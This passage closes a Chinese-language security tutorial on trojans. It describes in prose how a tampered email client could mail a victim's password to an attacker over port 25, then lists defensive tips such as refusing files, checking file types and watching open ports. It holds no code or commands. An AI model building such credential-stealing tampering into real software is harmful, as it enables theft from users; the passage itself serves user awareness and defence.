它象一个木马，比方说，你正在使用被修改过的邮件客户.人所共知，发送密码型木马会使用端口25发送一些

包含有信息的邮件.想象如果攻击者修改了你的邮件客户把你的邮箱密码发送给他（她）会怎样.当然，你会

看见（如果你正在监视的话）端口25正开着，但是，很可能你不会注意，因为你正在发送邮件（正常情况下

发邮件时端口25开着），正如我所说，人们正变得越来越聪明.

16.建议

我的一些建议将帮助你免受木马或病毒感染：

-1.从不接收文件，即使来自你的朋友.你永远也不能确定电脑的另一端是谁.

-2.当执行文件的时候，首先检查它的类型，因为有些人可能设诡计让你运行它.

-3.总是监视你计算机上的开放端口和运行的文件.

-4.只从官方主页下载软件

-5.当玩木马的时候，你可能感染自己，因为木马创造者有时将木马服务器放在客户里，因此当你运行客户的

时候，你也被感染了.这又一次向你显示木马是很危险的，一旦你犯了错误，你会丢失一些敏感数据.

-6.变得paranoid会更安全.人们总是嘲笑那些烧掉他们每张纸片的人，他们将所有的密码放在头脑里，并使

用加密，不用ICQ或IRC，因为他们知道这些协议是多么脆弱.

17.最后的话

文章到这里就没了，不久我将更新它.BTW，这是我的最大的也是写得最好的文章，我真的很喜欢它，我也希

望它将帮助那些想知道如何保护自己免受木马感染和想学更多有关知识的人们.这又是一篇安全相关的教程，正

如我以前所说我现在开始写这样的文章了.你可以查阅我的杂志：blackcode.com/bc-tech/magazine.php3

这篇指南出与教育目的，对读了这篇文章之后发生的任何事情，我不会承担任何责任.我只是告诉你如何做

而不是叫你做，那是你的决定.如果你想把这篇文章放在你的站点或FTP或新闻组或其他的任何地方，你可以这

样做，但是，没有作者的允许不要改变任何东西.看到这篇文章出现在其他的页面上，我将会感到很幸福.